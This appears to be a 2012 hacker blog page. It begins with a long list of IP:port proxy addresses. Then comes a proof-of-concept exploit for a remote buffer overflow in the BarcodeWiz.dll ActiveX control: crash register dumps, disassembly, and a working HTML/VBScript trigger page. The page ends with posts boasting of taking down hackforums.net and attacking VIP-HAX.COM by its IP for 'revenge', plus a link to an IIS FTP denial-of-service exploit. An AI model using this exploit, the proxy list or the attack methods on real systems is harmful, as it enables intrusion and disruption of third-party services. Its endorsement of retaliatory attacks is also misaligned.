  271. 75.85.136.141:9090
  272. 123.127.163.27:80
  273. 82.43.63.99:9090
  274. 71.86.150.78:9090
  275. 208.123.128.35:80
  276. 24.44.219.167:9090
  277. 203.86.31.92:3128
  278. 98.240.186.255:9090
  279. 74.206.98.202:8080
  280. 173.20.124.252:80
  281. 41.222.160.36:80
  282. 74.115.6.57:80
  283. 69.118.237.19:9090
  284. 201.68.8.180:80
  285. 92.233.226.34:9090
  286. 210.253.208.91:80
  287. 76.112.150.1:9090
  288. 221.130.13.211:80
  289. 88.104.209.63:9090
  290. 80.195.248.30:9090
  291. 58.248.46.69:8080
  292. 221.130.162.248:80
  293. 193.68.154.194:80
  294. 75.184.41.3:9090
  295. 121.246.72.97:80
  296. 64.203.35.90:80
  297. 95.215.2.33:3128
  298. 201.245.161.4:8080
  299. 201.13.169.167:6588
  300. 98.192.95.181:9090
  301. 95.46.120.87:3128
  302. 82.131.192.212:80
  303. 76.116.82.97:9090
  304. 121.58.96.10:80
  305. 211.138.124.196:80
  306. 94.89.80.218:3128
  307. 61.183.55.40:80
  308. 24.230.163.136:9090
  309. 24.254.34.183:9090
  310. 72.240.34.18:80
  311. 190.152.37.58:6588
  312. 173.45.229.206:9090
  313. 62.233.138.180:80
  314. 148.245.191.3:80
  315. 201.41.184.154:3128
  316. 72.24.212.232:9090
  317. 201.1.63.111:6588
  318. 112.215.23.83:80
  319. 64.179.170.189:9090
  320. 70.161.20.242:9090

BarcodeWiz.dll remote Buffer Overflow PoC

  1. Exploit Title: BarcodeWiz.dll remote Buffer Overflow PoC
  2. Date: July 25, 2012
  3. Author: Kypto  
  4. Kypto@programmer.net
  5. Https://twitter.com/ddos101
  6. Version: 4.0.0.0
  7. Tested on: windows 7 SP2
  8. ==========================================================================
  9. Class BarCodeWiz
  10. GUID: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
  11. Number of Interfaces: 1
  12. Default Interface: IWiz
  13. RegKey Safe for Script: True
  14. RegkeySafe for Init: True
  15. KillBitSet: False
  16. Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
  17. RegKey Safe for Script: True
  18. RegKey Safe for Init: True
  19. Implements IObjectSafety: True
  20. IDisp Safe:  Safe for untrusted: caller,data  
  21. IPersist Safe:  Safe for untrusted: caller,data  
  22. IPStorage Safe:  Safe for untrusted: caller,data  
  23. --------------------------------------------------------------------------
  24. Registers:
  25. --------------------------------------------------------------------------
  26. EIP 023F8D42
  27. EAX 00000021
  28. EBX 00000ADD
  29. ECX 025A2F58 -> 02439F8C
  30. EDX 00000001
  31. EDI 0046D48C -> 00000068
  32. ESI 025A2F58 -> 02439F8C
  33. EBP 0046D47C -> 0046E48C
  34. ESP 0046D464 -> 025A0AA8
  35. Block Disassembly:
  36. ----------------------------------------------------------------------------
  37. 23F8D33 INC EBX
  38. 23F8D34 MOV [EBP+8],ECX
  39. 23F8D37 PUSH ECX
  40. 23F8D38 PUSH DWORD PTR [EBP-8]
  41. 23F8D3B MOV ECX,ESI
  42. 23F8D3D CALL 023F837E
  43. 23F8D42 MOV [EDI+EBX*4],EAX       <--- CRASH
  44. 23F8D45 INC EBX
  45. 23F8D46 DEC DWORD PTR [EBP-4]
  46. 23F8D49 MOV EAX,[EBP-4]
  47. 23F8D4C CMP EAX,[EBP-C]
  48. 23F8D4F JL 023F8C80
  49. 23F8D55 JMP 023F8ECE
  50. 23F8D5A MOV EAX,[ESI]
  51. 23F8D5C PUSH EBX
  52. ArgDump:
  53. --------------------------------------------------
  54. EBP+8   00000006
  55. EBP+12  025A2F58 -> 02439F8C
  56. EBP+16  00000068
  57. EBP+20  00000021
  58. EBP+24  00000021
  59. EBP+28  00000021
  60. ============================================================================
  61. <html>
  62. Exploit
  63. <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc' /></object>
  64. <script language='vbscript'>
  65. targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX Trial\DLL\BarcodeWiz.dll"
  66. prototype  = "Property Let Barcode As String"
  67. memberName = "Barcode"
  68. progid     = "BARCODEWIZLib.BarCodeWiz"
  69. argCount   = 1
  70. arg1=String(14356, "A")
  71. poc.Barcode = arg1
  72. </script>

Monday 23 July 2012

just took down www.hackforums.net because of simple reasons, lets face it.. alot of people go there and claim there some super soilder hacker when clearly there nothing :)

Tuesday 3 July 2012

Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service

Link To Information Here.

http://pastebin.com/c5St3zgE
Attack Towards VIP-HAX.COM -

More Information About Why I Attacked This Site Are Below.

Site's IP - 46.166.150.103
Owner - Unknown
Vuln's - Way Too Many To Count..

Reason : Running an botnet on the backend to attack low grade servers. it just seem's they tried to attack a server that i know and revenge is a right bitch.